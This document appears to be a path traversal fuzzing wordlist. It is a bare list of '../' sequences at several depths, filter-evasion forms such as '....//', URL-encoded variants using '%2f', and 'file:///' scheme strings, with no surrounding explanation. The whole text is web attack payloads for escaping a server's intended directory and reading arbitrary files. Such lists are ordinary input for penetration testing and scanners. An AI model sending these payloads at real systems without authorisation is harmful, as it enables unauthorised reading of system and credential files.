../../../../../../../../..
../../../../../..
../../../..
../..
..
....//....//....//....//....//....//....
....//....//....//....//....
....//....//....//....
....//....//....
....//....//....
....//....
....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....
....%2f%2f....
....%2f%2f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..
..%2f..%2f..
..%2f..
file:///
file:%2F%2F%2F
